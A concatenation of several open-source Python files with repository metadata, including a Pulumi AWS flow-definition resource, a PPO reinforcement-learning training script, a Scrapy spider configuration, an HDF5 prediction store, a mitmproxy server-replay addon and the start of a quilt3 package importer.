:param pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopConfigArgs']] human_loop_config: An object containing information about the tasks the human reviewers will perform. See Human Loop Config details below.
:param pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopRequestSourceArgs']] human_loop_request_source: Container for configuring the source of human task requests. Use to specify if Amazon Rekognition or Amazon Textract is used as an integration source. See Human Loop Request Source details below.
:param pulumi.Input[pulumi.InputType['FlowDefinitionOutputConfigArgs']] output_config: An object containing information about where the human review results will be uploaded. See Output Config details below.
:param pulumi.Input[str] role_arn: The Amazon Resource Name (ARN) of the role needed to call other services on your behalf.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _FlowDefinitionState.__new__(_FlowDefinitionState)
__props__.__dict__["arn"] = arn
__props__.__dict__["flow_definition_name"] = flow_definition_name
__props__.__dict__["human_loop_activation_config"] = human_loop_activation_config
__props__.__dict__["human_loop_config"] = human_loop_config
__props__.__dict__["human_loop_request_source"] = human_loop_request_source
__props__.__dict__["output_config"] = output_config
__props__.__dict__["role_arn"] = role_arn
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
return FlowDefinition(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
The Amazon Resource Name (ARN) assigned by AWS to this Flow Definition.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="flowDefinitionName")
def flow_definition_name(self) -> pulumi.Output[str]:
"""
The name of your flow definition.
"""
return pulumi.get(self, "flow_definition_name")
@property
@pulumi.getter(name="humanLoopActivationConfig")
def human_loop_activation_config(self) -> pulumi.Output[Optional['outputs.FlowDefinitionHumanLoopActivationConfig']]:
"""
An object containing information about the events that trigger a human workflow. See Human Loop Activation Config details below.
"""
return pulumi.get(self, "human_loop_activation_config")
@property
@pulumi.getter(name="humanLoopConfig")
def human_loop_config(self) -> pulumi.Output['outputs.FlowDefinitionHumanLoopConfig']:
"""
An object containing information about the tasks the human reviewers will perform. See Human Loop Config details below.
"""
return pulumi.get(self, "human_loop_config")
@property
@pulumi.getter(name="humanLoopRequestSource")
def human_loop_request_source(self) -> pulumi.Output[Optional['outputs.FlowDefinitionHumanLoopRequestSource']]:
"""
Container for configuring the source of human task requests. Use to specify if Amazon Rekognition or Amazon Textract is used as an integration source. See Human Loop Request Source details below.
"""
return pulumi.get(self, "human_loop_request_source")
@property
@pulumi.getter(name="outputConfig")
def output_config(self) -> pulumi.Output['outputs.FlowDefinitionOutputConfig']:
"""
An object containing information about where the human review results will be uploaded. See Output Config details below.
"""
return pulumi.get(self, "output_config")
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> pulumi.Output[str]:
"""
The Amazon Resource Name (ARN) of the role needed to call other services on your behalf.
"""
return pulumi.get(self, "role_arn")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A map of tags to assign to the resource. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> pulumi.Output[Mapping[str, str]]:
"""
A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
return pulumi.get(self, "tags_all")
| 55.259574
| 348
| 0.686252
|
a39e1904b8eeb1d7214e8498ece1b591e435802b
| 22,656
|
py
|
Python
|
scripts/train_rl.py
|
joel99/midlevel-reps
|
f0b4a4d8ccf09a0488cd18af24723172aff99446
|
[
"MIT"
] | 120
|
2019-04-22T04:45:28.000Z
|
2022-03-23T01:53:17.000Z
|
scripts/train_rl.py
|
joel99/midlevel-reps
|
f0b4a4d8ccf09a0488cd18af24723172aff99446
|
[
"MIT"
] | 14
|
2019-06-12T08:21:21.000Z
|
2021-08-25T15:36:58.000Z
|
scripts/train_rl.py
|
joel99/midlevel-reps
|
f0b4a4d8ccf09a0488cd18af24723172aff99446
|
[
"MIT"
] | 19
|
2019-06-19T07:00:36.000Z
|
2022-03-24T07:18:30.000Z
|
# train_rl.py
# Authors: Sasha Sax (1,3), Bradley Emi (2), Jeffrey Zhang (1) -- UC Berkeley, FAIR, Stanford VL
# Desc: Train or test an agent using PPO.
# Usage:
# python -m scripts.train_rl DIRECTORY_TO_SAVE_RESULTS run_training with uuid=EXP_UUID [CFG1 ...] [cfg.SUB_CFG1.PROPERTY1 ...]
# Notes:
# (i) must be run from parent directory (top-level of git)
# (ii) currently, a visdom instance MUST be used or the script will fail. Defaults to localhost.
import sys
import shutil
import copy
import glob
from gym import logger
from gym import spaces
import gym
import logging
import numpy as np
import os
import pprint
import random
import runpy
import sacred
import subprocess
import time
import torch
import torchvision.utils
from evkit.env.wrappers import ProcessObservationWrapper
from evkit.env import EnvFactory
from evkit.models.architectures import AtariNet, TaskonomyFeaturesOnlyNet
from evkit.models.taskonomy_network import TaskonomyNetwork
from evkit.models.actor_critic_module import NaivelyRecurrentACModule
from evkit.preprocess.transforms import rescale_centercrop_resize, rescale, grayscale_rescale, cross_modal_transform, identity_transform, rescale_centercrop_resize_collated, map_pool_collated, map_pool, taskonomy_features_transform, image_to_input_collated, taskonomy_multi_features_transform
from evkit.preprocess.baseline_transforms import blind, pixels_as_state
from evkit.preprocess import TransformFactory
import evkit.rl.algo
from evkit.rl.policy import Policy, PolicyWithBase, BackoutPolicy
from evkit.rl.storage import RolloutSensorDictStorage, RolloutSensorDictReplayBuffer, StackedSensorDictStorage
from evkit.saving.checkpoints import checkpoint_name, save_checkpoint, last_archived_run
from evkit.saving.observers import FileStorageObserverWithExUuid
from evkit.utils.misc import Bunch, cfg_to_md, compute_weight_norm, is_interactive, remove_whitespace, update_dict_deepcopy
import evkit.utils.logging
from evkit.utils.random import set_seed
import tnt.torchnet as tnt
# Set up experiment using SACRED
ex = sacred.Experiment(name="RL Training", interactive=is_interactive())
LOG_DIR = sys.argv[1].strip()
sys.argv.pop(1)
runpy.run_module('configs.core', init_globals=globals())
runpy.run_module('configs.image_architectures', init_globals=globals())
runpy.run_module('configs.habitat', init_globals=globals())
runpy.run_module('configs.gibson', init_globals=globals())
runpy.run_module('configs.doom', init_globals=globals())
logging.basicConfig(level=logging.DEBUG, format='%(message)s')
logger = logging.getLogger()
def log_input_images(obs_unpacked, mlog, num_stack, key_names=['map'], meter_name='debug/input_images', step_num=0):
# Plots the observations from the first process
stacked = []
for key_name in key_names:
if key_name not in obs_unpacked:
logger.debug(key_name, "not found")
continue
obs = obs_unpacked[key_name][0]
obs = (obs + 1.0) / 2.0
obs_chunked = list(torch.chunk(obs, num_stack, dim=0))
key_stacked = torchvision.utils.make_grid(obs_chunked, nrow=num_stack, padding=2)
stacked.append(key_stacked)
stacked = torch.cat(stacked, dim=1)
mlog.update_meter(stacked, meters={meter_name})
mlog.reset_meter(step_num, meterlist={meter_name})
@ex.main
def run_training(cfg, uuid):
try:
logger.info("Running with configuration:\n" + pprint.pformat(cfg))
torch.set_num_threads(1)
set_seed(cfg['training']['seed'])
# get new output_dir name (use for checkpoints)
old_log_dir = cfg['saving']['log_dir']
changed_log_dir = False
existing_log_paths = []
if os.path.exists(old_log_dir) and cfg['saving']['autofix_log_dir']:
LOG_DIR, existing_log_paths = evkit.utils.logging.unused_dir_name(old_log_dir)
os.makedirs(LOG_DIR, exist_ok=False)
cfg['saving']['log_dir'] = LOG_DIR
cfg['saving']['results_log_file'] = os.path.join(LOG_DIR, 'result_log.pkl')
cfg['saving']['reward_log_file'] = os.path.join(LOG_DIR, 'rewards.pkl')
cfg['saving']['visdom_log_file'] = os.path.join(LOG_DIR, 'visdom_logs.json')
changed_log_dir = True
# Load checkpoint, config, agent
agent = None
if cfg['training']['resumable']:
if cfg['saving']['checkpoint']:
prev_run_path = cfg['saving']['checkpoint']
ckpt_fpath = os.path.join(prev_run_path, 'checkpoints', 'ckpt-latest.dat')
if cfg['saving']['checkpoint_configs']: # update configs with values from ckpt
prev_run_metadata_paths = [ os.path.join(prev_run_path, f)
for f in os.listdir(prev_run_path)
if f.endswith('metadata')]
prev_run_config_path = os.path.join(prev_run_metadata_paths[0], 'config.json')
with open(prev_run_config_path) as f:
config = json.load(f) # keys are ['cfg', 'uuid', 'seed']
cfg = update_dict_deepcopy(cfg, config['cfg'])
uuid = config['uuid']
logger.warning("Reusing config from {}".format(prev_run_config_path))
if ckpt_fpath is not None and os.path.exists(ckpt_fpath):
checkpoint_obj = torch.load(ckpt_fpath)
start_epoch = checkpoint_obj['epoch']
logger.info("Loaded learner (epoch {}) from {}".format(start_epoch, ckpt_fpath))
agent = checkpoint_obj['agent']
actor_critic = agent.actor_critic
else:
logger.warning("No checkpoint found at {}".format(ckpt_fpath))
# Make environment
simulator, scenario = cfg['env']['env_name'].split('_')
if cfg['env']['transform_fn_pre_aggregation'] is None:
cfg['env']['transform_fn_pre_aggregation'] = "None"
envs = EnvFactory.vectorized(
cfg['env']['env_name'],
cfg['training']['seed'],
cfg['env']['num_processes'],
cfg['saving']['log_dir'],
cfg['env']['add_timestep'],
env_specific_kwargs = cfg['env']['env_specific_kwargs'],
num_val_processes = cfg['env']['num_val_processes'],
preprocessing_fn = eval(cfg['env']['transform_fn_pre_aggregation']),
addl_repeat_count = cfg['env']['additional_repeat_count'],
sensors = cfg['env']['sensors'],
vis_interval = cfg['saving']['vis_interval'],
visdom_server = cfg['saving']['visdom_server'],
visdom_port = cfg['saving']['visdom_port'],
visdom_log_file = cfg['saving']['visdom_log_file'],
visdom_name = uuid)
if 'transform_fn_post_aggregation' in cfg['env'] and cfg['env']['transform_fn_post_aggregation'] is not None:
transform, space = eval(cfg['env']['transform_fn_post_aggregation'])(envs.observation_space)
envs = ProcessObservationWrapper(envs, transform, space)
is_habitat_env = (simulator == 'Habitat')
action_space = envs.action_space
observation_space = envs.observation_space
retained_obs_shape = { k: v.shape
for k, v in observation_space.spaces.items()
if k in cfg['env']['sensors']}
logger.info(f"Action space: {action_space}")
logger.info(f"Observation space: {observation_space}")
logger.info("Retaining: {}".format(set(observation_space.spaces.keys()).intersection(cfg['env']['sensors'].keys())))
# Finish setting up the agent
if agent == None:
perception_model = eval(cfg['learner']['perception_network'])(
cfg['learner']['num_stack'],
**cfg['learner']['perception_network_kwargs'])
base = NaivelyRecurrentACModule(
perception_unit=perception_model,
use_gru=cfg['learner']['recurrent_policy'],
internal_state_size=cfg['learner']['internal_state_size'])
actor_critic = PolicyWithBase(
base, action_space,
num_stack=cfg['learner']['num_stack'],
takeover=None)
if cfg['learner']['use_replay']:
agent = evkit.rl.algo.PPOReplay(actor_critic,
cfg['learner']['clip_param'],
cfg['learner']['ppo_epoch'],
cfg['learner']['num_mini_batch'],
cfg['learner']['value_loss_coef'],
cfg['learner']['entropy_coef'],
cfg['learner']['on_policy_epoch'],
cfg['learner']['off_policy_epoch'],
lr=cfg['learner']['lr'],
eps=cfg['learner']['eps'],
max_grad_norm=cfg['learner']['max_grad_norm'])
else:
agent = evkit.rl.algo.PPO(actor_critic,
cfg['learner']['clip_param'],
cfg['learner']['ppo_epoch'],
cfg['learner']['num_mini_batch'],
cfg['learner']['value_loss_coef'],
cfg['learner']['entropy_coef'],
lr=cfg['learner']['lr'],
eps=cfg['learner']['eps'],
max_grad_norm=cfg['learner']['max_grad_norm'])
start_epoch = 0
# Machinery for storing rollouts
num_train_processes = cfg['env']['num_processes'] - cfg['env']['num_val_processes']
num_val_processes = cfg['env']['num_val_processes']
assert cfg['env']['num_val_processes'] < cfg['env']['num_processes'], "Can't train without some training processes!"
current_obs = StackedSensorDictStorage(cfg['env']['num_processes'], cfg['learner']['num_stack'], retained_obs_shape)
current_train_obs = StackedSensorDictStorage(num_train_processes, cfg['learner']['num_stack'], retained_obs_shape)
logger.debug(f'Stacked obs shape {current_obs.obs_shape}')
if cfg['learner']['use_replay']:
rollouts = RolloutSensorDictReplayBuffer(
cfg['learner']['num_steps'],
num_train_processes,
current_obs.obs_shape,
action_space,
cfg['learner']['internal_state_size'],
actor_critic,
cfg['learner']['use_gae'],
cfg['learner']['gamma'],
cfg['learner']['tau'],
cfg['learner']['replay_buffer_size'])
else:
rollouts = RolloutSensorDictStorage(
cfg['learner']['num_steps'],
num_train_processes,
current_obs.obs_shape,
action_space,
cfg['learner']['internal_state_size'])
# Set up logging
if cfg['saving']['logging_type'] == 'visdom':
mlog = tnt.logger.VisdomMeterLogger(
title=uuid, env=uuid,
server=cfg['saving']['visdom_server'],
port=cfg['saving']['visdom_port'],
log_to_filename=cfg['saving']['visdom_log_file'])
elif cfg['saving']['logging_type'] == 'tensorboard':
mlog = tnt.logger.TensorboardMeterLogger(
env=uuid,
log_dir=cfg['saving']['log_dir'],
plotstylecombined=True)
else:
raise NotImplementedError("Unknown logger type: ({cfg['saving']['logging_type']})")
# Add metrics and logging to TB/Visdom
loggable_metrics = ['metrics/rewards',
'diagnostics/dist_perplexity',
'diagnostics/lengths',
'diagnostics/max_importance_weight',
'diagnostics/value',
'losses/action_loss',
'losses/dist_entropy',
'losses/value_loss']
core_metrics = ['metrics/rewards', 'diagnostics/lengths']
debug_metrics = ['debug/input_images']
if 'habitat' in cfg['env']['env_name'].lower():
for metric in ['metrics/spl', 'metrics/success']:
loggable_metrics.append(metric)
core_metrics.append(metric)
for meter in loggable_metrics:
mlog.add_meter(meter, tnt.meter.ValueSummaryMeter())
for debug_meter in debug_metrics:
mlog.add_meter(debug_meter, tnt.meter.SingletonMeter(), ptype='image')
mlog.add_meter('config', tnt.meter.SingletonMeter(), ptype='text')
mlog.update_meter(cfg_to_md(cfg, uuid), meters={'config'}, phase='train')
# File loggers
flog = tnt.logger.FileLogger(cfg['saving']['results_log_file'], overwrite=True)
reward_only_flog = tnt.logger.FileLogger(cfg['saving']['reward_log_file'], overwrite=True)
# replay data to mlog, move metadata file
if changed_log_dir:
evkit.utils.logging.replay_logs(existing_log_paths, mlog)
evkit.utils.logging.move_metadata_file(old_log_dir, cfg['saving']['log_dir'], uuid)
##########
# LEARN! #
##########
if cfg['training']['cuda']:
current_train_obs = current_train_obs.cuda()
current_obs = current_obs.cuda()
rollouts.cuda()
actor_critic.cuda()
# These variables are used to compute average rewards for all processes.
episode_rewards = torch.zeros([cfg['env']['num_processes'], 1])
episode_lengths = torch.zeros([cfg['env']['num_processes'], 1])
# First observation
obs = envs.reset()
current_obs.insert(obs)
mask_done = torch.FloatTensor([[0.0] for _ in range(cfg['env']['num_processes'])]).pin_memory()
states = torch.zeros(cfg['env']['num_processes'], cfg['learner']['internal_state_size']).pin_memory()
# Main loop
start_time = time.time()
num_updates = int(cfg['training']['num_frames']) // ( cfg['learner']['num_steps'] * cfg['env']['num_processes'] )
logger.info(f"Running until num updates == {num_updates}")
for j in range(start_epoch, num_updates, 1):
for step in range(cfg['learner']['num_steps']):
obs_unpacked = {k: current_obs.peek()[k].peek() for k in current_obs.peek()}
if j == start_epoch and step < 10:
log_input_images(obs_unpacked, mlog, num_stack=cfg['learner']['num_stack'],
key_names=['rgb_filled', 'map'], meter_name='debug/input_images', step_num=step)
# Sample actions
with torch.no_grad():
value, action, action_log_prob, states = actor_critic.act(
obs_unpacked,
states.cuda(),
mask_done.cuda())
cpu_actions = list(action.squeeze(1).cpu().numpy())
obs, reward, done, info = envs.step(cpu_actions)
reward = torch.from_numpy(np.expand_dims(np.stack(reward), 1)).float()
# Handle terminated episodes; logging values and computing the "done" mask
episode_rewards += reward
episode_lengths += (1 + cfg['env']['additional_repeat_count'])
mask_done = torch.FloatTensor([[0.0] if done_ else [1.0] for done_ in done])
for i, (r, l, done_) in enumerate(zip(episode_rewards, episode_lengths, done)): # Logging loop
if done_:
phase = 'train' if i < num_train_processes else 'val'
mlog.update_meter(r, meters={'metrics/rewards'}, phase=phase)
mlog.update_meter(l, meters={'diagnostics/lengths'}, phase=phase)
if 'habitat' in cfg['env']['env_name'].lower():
mlog.update_meter(info[i]["spl"], meters={'metrics/spl'}, phase=phase)
mlog.update_meter(np.ceil(info[i]["spl"]), meters={'metrics/success'}, phase=phase)
episode_rewards *= mask_done
episode_lengths *= mask_done
# Insert the new observation into RolloutStorage
if cfg['training']['cuda']:
mask_done = mask_done.cuda()
for k in obs:
if k in current_train_obs.sensor_names:
current_train_obs[k].insert(obs[k][:num_train_processes], mask_done[:num_train_processes])
current_obs.insert(obs, mask_done)
rollouts.insert(current_train_obs.peek(),
states[:num_train_processes],
action[:num_train_processes],
action_log_prob[:num_train_processes],
value[:num_train_processes],
reward[:num_train_processes],
mask_done[:num_train_processes])
mlog.update_meter(value[:num_train_processes].mean().item(), meters={'diagnostics/value'}, phase='train')
# Training update
if not cfg['learner']['test']:
if not cfg['learner']['use_replay']:
# Moderate compute saving optimization (if no replay buffer):
# Estimate future-discounted returns only once
with torch.no_grad():
next_value = actor_critic.get_value(rollouts.observations.at(-1),
rollouts.states[-1],
rollouts.masks[-1]).detach()
rollouts.compute_returns(next_value, cfg['learner']['use_gae'], cfg['learner']['gamma'], cfg['learner']['tau'])
value_loss, action_loss, dist_entropy, max_importance_weight, info = agent.update(rollouts)
rollouts.after_update() # For the next iter: initial obs <- current observation
# Update meters with latest training info
mlog.update_meter(dist_entropy, meters={'losses/dist_entropy'})
mlog.update_meter(np.exp(dist_entropy), meters={'diagnostics/dist_perplexity'})
mlog.update_meter(value_loss, meters={'losses/value_loss'})
mlog.update_meter(action_loss, meters={'losses/action_loss'})
mlog.update_meter(max_importance_weight, meters={'diagnostics/max_importance_weight'})
# Main logging
if (j) % cfg['saving']['log_interval'] == 0:
n_steps_since_logging = cfg['saving']['log_interval'] * num_train_processes * cfg['learner']['num_steps']
total_num_steps = (j + 1) * num_train_processes * cfg['learner']['num_steps']
logger.info("Update {}, num timesteps {}, FPS {}".format(
j + 1,
total_num_steps,
int(n_steps_since_logging / (time.time() - start_time))
))
for metric in core_metrics: # Log to stdout
for mode in ['train', 'val']:
if metric in core_metrics or mode == 'train':
mlog.print_meter(mode, total_num_steps, meterlist={metric})
for mode in ['train', 'val']: # Log to files
results = mlog.peek_meter(phase=mode)
reward_only_flog.log(mode, {metric: results[metric] for metric in core_metrics})
if mode == 'train':
results['step_num'] = j + 1
flog.log('all_results', results)
mlog.reset_meter(total_num_steps, mode=mode)
start_time = time.time()
# Save checkpoint
if j % cfg['saving']['save_interval'] == 0:
save_dir_absolute = os.path.join(cfg['saving']['log_dir'], cfg['saving']['save_dir'])
save_checkpoint(
{ 'agent': agent, 'epoch': j },
save_dir_absolute, j)
# Clean up (either after ending normally or early [e.g. from a KeyboardInterrupt])
finally:
try:
if isinstance(envs, list):
[env.close() for env in envs]
else:
envs.close()
logger.info("Killed envs.")
except UnboundLocalError:
logger.info("No envs to kill!")
if is_interactive() and __name__ == '__main__':
assert LOG_DIR, 'log dir cannot be empty'
os.makedirs(LOG_DIR, exist_ok=True)
subprocess.call("rm -rf {}/*".format(LOG_DIR), shell=True)
ex.observers.append(FileStorageObserverWithExUuid.create(LOG_DIR))
ex.run_commandline(
'run_config with \
uuid="gibson_random" \
cfg.env.num_processes=1\
'.format())
elif __name__ == '__main__':
assert LOG_DIR, 'log dir cannot be empty'
os.makedirs(LOG_DIR, exist_ok=True)
subprocess.call("rm -rf {}/*".format(LOG_DIR), shell=True)
ex.observers.append(FileStorageObserverWithExUuid.create(LOG_DIR))
try:
ex.run_commandline()
except FileNotFoundError as e:
logger.error(f'File not found! Are you trying to test an experiment with the uuid: {e}?')
raise e
else:
logger.info(__name__)
| 53.687204
| 292
| 0.561441
|
78ffc8df031b65a3c88707db240e56f67bfff2d0
| 979
|
py
|
Python
|
scraper/storage_spiders/aothun24hvn.py
|
chongiadung/choinho
|
d2a216fe7a5064d73cdee3e928a7beef7f511fd1
|
[
"MIT"
] | null | null | null |
scraper/storage_spiders/aothun24hvn.py
|
chongiadung/choinho
|
d2a216fe7a5064d73cdee3e928a7beef7f511fd1
|
[
"MIT"
] | 10
|
2020-02-11T23:34:28.000Z
|
2022-03-11T23:16:12.000Z
|
scraper/storage_spiders/aothun24hvn.py
|
chongiadung/choinho
|
d2a216fe7a5064d73cdee3e928a7beef7f511fd1
|
[
"MIT"
] | 3
|
2018-08-05T14:54:25.000Z
|
2021-06-07T01:49:59.000Z
|
# Auto generated by generator.py. Delete this line if you make modification.
from scrapy.spiders import Rule
from scrapy.linkextractors import LinkExtractor
XPATH = {
'name' : "//span[@id='ctl00_MainContent_ProductDetail1_lblProductName']",
'price' : "//span[@class='price color_red']",
'category' : "",
'description' : "//div[@id='content']/div[@class='content_ct']/div/span",
'images' : "//img[@id='ctl00_MainContent_ProductDetail1_imgPro']/@src",
'canonical' : "",
'base_url' : "",
'brand' : "",
'in_stock' : "",
'guarantee' : "",
'promotion' : ""
}
name = 'aothun24h.vn'
allowed_domains = ['aothun24h.vn']
start_urls = ['http://aothun24h.vn']
tracking_url = ''
sitemap_urls = ['']
sitemap_rules = [('', 'parse_item')]
sitemap_follow = ['']
rules = [
Rule(LinkExtractor(allow=['/chi-tiet-san-pham/']), 'parse_item'),
Rule(LinkExtractor(allow=['/san-pham/']), 'parse'),
#Rule(LinkExtractor(), 'parse_item_and_links'),
]
| 32.633333
| 77
| 0.640449
|
6c6c15b177918a6ddf8234e579d02cd1547b5b8f
| 3,363
|
py
|
Python
|
pepper_snp/modules/python/DataStorePredict.py
|
Samteymoori/pepper
|
734d226de47a855952e3b58145c1fcfbe221d3b4
|
[
"MIT"
] | null | null | null |
pepper_snp/modules/python/DataStorePredict.py
|
Samteymoori/pepper
|
734d226de47a855952e3b58145c1fcfbe221d3b4
|
[
"MIT"
] | null | null | null |
pepper_snp/modules/python/DataStorePredict.py
|
Samteymoori/pepper
|
734d226de47a855952e3b58145c1fcfbe221d3b4
|
[
"MIT"
] | null | null | null |
import h5py
import yaml
import numpy as np
class DataStore(object):
"""Class to read/write to a FRIDAY's file"""
_prediction_path_ = 'predictions'
_groups_ = ('position', 'index', 'bases', 'rles')
def __init__(self, filename, mode='r'):
self.filename = filename
self.mode = mode
self._sample_keys = set()
self.file_handler = h5py.File(self.filename, self.mode)
self._meta = None
def __exit__(self, *args):
if self.mode != 'r' and self._meta is not None:
self._write_metadata(self.meta)
self.file_handler.close()
def _write_metadata(self, data):
"""Save a data structure to file within a yml str."""
for group, d in data.items():
if group in self.file_handler:
del self.file_handler[group]
self.file_handler[group] = yaml.dump(d)
def _load_metadata(self, groups=None):
"""Load meta data"""
if groups is None:
groups = self._groups_
return {g: yaml.load(self.file_handler[g][()]) for g in groups if g in self.file_handler}
@property
def meta(self):
if self._meta is None:
self._meta = self._load_metadata()
return self._meta
def update_meta(self, meta):
"""Update metadata"""
self._meta = self.meta
self._meta.update(meta)
def write_prediction(self, contig, contig_start, contig_end, chunk_id, position, index, predicted_bases, ref_seq):
chunk_name_prefix = str(contig) + "-" + str(contig_start.item()) + "-" + str(contig_end.item())
chunk_name_suffix = str(chunk_id.item())
name = contig + chunk_name_prefix + chunk_name_suffix
if 'predictions' not in self.meta:
self.meta['predictions'] = set()
if 'predictions_contig' not in self.meta:
self.meta['predictions_contig'] = set()
if chunk_name_prefix not in self.meta['predictions_contig']:
self.meta['predictions_contig'].add(chunk_name_prefix)
self.file_handler['{}/{}/{}/{}'.format(self._prediction_path_, contig, chunk_name_prefix, 'contig_start')] \
= contig_start.item()
self.file_handler['{}/{}/{}/{}'.format(self._prediction_path_, contig, chunk_name_prefix, 'contig_end')] \
= contig_end.item()
if name not in self.meta['predictions']:
self.meta['predictions'].add(name)
self.file_handler['{}/{}/{}/{}/{}'.format(self._prediction_path_, contig, chunk_name_prefix,
chunk_name_suffix, 'position')] = np.array(position, dtype=np.int32)
self.file_handler['{}/{}/{}/{}/{}'.format(self._prediction_path_, contig, chunk_name_prefix,
chunk_name_suffix, 'index')] = np.array(index, dtype=np.int32)
# self.file_handler['{}/{}/{}/{}/{}'.format(self._prediction_path_, contig, chunk_name_prefix,
# chunk_name_suffix, 'ref_seq')] = np.array(ref_seq, dtype=np.uint8)
self.file_handler['{}/{}/{}/{}/{}'.format(self._prediction_path_, contig, chunk_name_prefix,
chunk_name_suffix, 'bases')] = predicted_bases.astype(np.int32)
| 42.56962
| 122
| 0.585787
|
20fcfc2a1f3b6aef0b88a0a2600ea6daecfdcb4c
| 4,980
|
py
|
Python
|
mitmproxy/addons/serverplayback.py
|
00cool/project-X
|
a76988a07311a6e9706197d1ca5c7c5961cfaf9a
|
[
"MIT"
] | null | null | null |
mitmproxy/addons/serverplayback.py
|
00cool/project-X
|
a76988a07311a6e9706197d1ca5c7c5961cfaf9a
|
[
"MIT"
] | 1
|
2021-05-11T20:51:11.000Z
|
2021-05-11T20:51:11.000Z
|
mitmproxy/addons/serverplayback.py
|
00cool/project-X
|
a76988a07311a6e9706197d1ca5c7c5961cfaf9a
|
[
"MIT"
] | null | null | null |
import hashlib
import urllib
import typing
from typing import Any # noqa
from typing import List # noqa
from mitmproxy import ctx
from mitmproxy import flow
from mitmproxy import exceptions
from mitmproxy import io
from mitmproxy import command
import mitmproxy.types
class ServerPlayback:
def __init__(self):
self.flowmap = {}
self.stop = False
self.final_flow = None
self.configured = False
@command.command("replay.server")
def load_flows(self, flows: typing.Sequence[flow.Flow]) -> None:
"""
Replay server responses from flows.
"""
self.flowmap = {}
for i in flows:
if i.response: # type: ignore
l = self.flowmap.setdefault(self._hash(i), [])
l.append(i)
ctx.master.addons.trigger("update", [])
@command.command("replay.server.file")
def load_file(self, path: mitmproxy.types.Path) -> None:
try:
flows = io.read_flows_from_paths([path])
except exceptions.FlowReadException as e:
raise exceptions.CommandError(str(e))
self.load_flows(flows)
@command.command("replay.server.stop")
def clear(self) -> None:
"""
Stop server replay.
"""
self.flowmap = {}
ctx.master.addons.trigger("update", [])
def count(self):
return sum([len(i) for i in self.flowmap.values()])
def _hash(self, flow):
"""
Calculates a loose hash of the flow request.
"""
r = flow.request
_, _, path, _, query, _ = urllib.parse.urlparse(r.url)
queriesArray = urllib.parse.parse_qsl(query, keep_blank_values=True)
key = [str(r.port), str(r.scheme), str(r.method), str(path)] # type: List[Any]
if not ctx.options.server_replay_ignore_content:
if ctx.options.server_replay_ignore_payload_params and r.multipart_form:
key.extend(
(k, v)
for k, v in r.multipart_form.items(multi=True)
if k.decode(errors="replace") not in ctx.options.server_replay_ignore_payload_params
)
elif ctx.options.server_replay_ignore_payload_params and r.urlencoded_form:
key.extend(
(k, v)
for k, v in r.urlencoded_form.items(multi=True)
if k not in ctx.options.server_replay_ignore_payload_params
)
else:
key.append(str(r.raw_content))
if not ctx.options.server_replay_ignore_host:
key.append(r.host)
filtered = []
ignore_params = ctx.options.server_replay_ignore_params or []
for p in queriesArray:
if p[0] not in ignore_params:
filtered.append(p)
for p in filtered:
key.append(p[0])
key.append(p[1])
if ctx.options.server_replay_use_headers:
headers = []
for i in ctx.options.server_replay_use_headers:
v = r.headers.get(i)
headers.append((i, v))
key.append(headers)
return hashlib.sha256(
repr(key).encode("utf8", "surrogateescape")
).digest()
def next_flow(self, request):
"""
Returns the next flow object, or None if no matching flow was
found.
"""
hsh = self._hash(request)
if hsh in self.flowmap:
if ctx.options.server_replay_nopop:
return self.flowmap[hsh][0]
else:
ret = self.flowmap[hsh].pop(0)
if not self.flowmap[hsh]:
del self.flowmap[hsh]
return ret
def configure(self, updated):
if not self.configured and ctx.options.server_replay:
self.configured = True
try:
flows = io.read_flows_from_paths(ctx.options.server_replay)
except exceptions.FlowReadException as e:
raise exceptions.OptionsError(str(e))
self.load_flows(flows)
def tick(self):
if self.stop and not self.final_flow.live:
ctx.master.addons.trigger("processing_complete")
def request(self, f):
if self.flowmap:
rflow = self.next_flow(f)
if rflow:
response = rflow.response.copy()
response.is_replay = True
if ctx.options.refresh_server_playback:
response.refresh()
f.response = response
if not self.flowmap:
self.final_flow = f
self.stop = True
elif ctx.options.replay_kill_extra:
ctx.log.warn(
"server_playback: killed non-replay request {}".format(
f.request.url
)
)
f.reply.kill()
| 33.648649
| 104
| 0.554618
|
0a2e706551d61595debabb4ac0707dcd03e52f61
| 2,741
|
py
|
Python
|
api/python/quilt3/imports.py
|
fiskus/quilt
|
a5945a111a3065ecd23e64d069aa67e42492c5f2
|
[
"Apache-2.0"
] | null | null | null |
api/python/quilt3/imports.py
|
fiskus/quilt
|
a5945a111a3065ecd23e64d069aa67e42492c5f2
|
[
"Apache-2.0"
] | null | null | null |
api/python/quilt3/imports.py
|
fiskus/quilt
|
a5945a111a3065ecd23e64d069aa67e42492c5f2
|
[
"Apache-2.0"
] | null | null | null |
"""Implementation of the Python Quilt data package loader."""
from importlib.machinery import ModuleSpec
import sys
from quilt3 import Package
from .backends import get_package_registry
MODULE_PATH = []
class DataPackageImporter:
"""
Data package module loader. Executes package import code and adds the package to the
module cache.
"""
@classmethod
def create_module(cls, spec): # pylint: disable=unused-argument
"""
Module creator. Returning None causes Python to use the default module creator.
"""
return None
@classmethod
def exec_module(cls, module):
"""
Module executor.
"""
name_parts = module.__name__.split('.')
if module.__name__ == 'quilt3.data':
# __path__ must be set even if the package is virtual. Since __path__ will be
# scanned by all other finders preceding this one in sys.meta_path order, make sure
# it points to someplace lacking importable objects
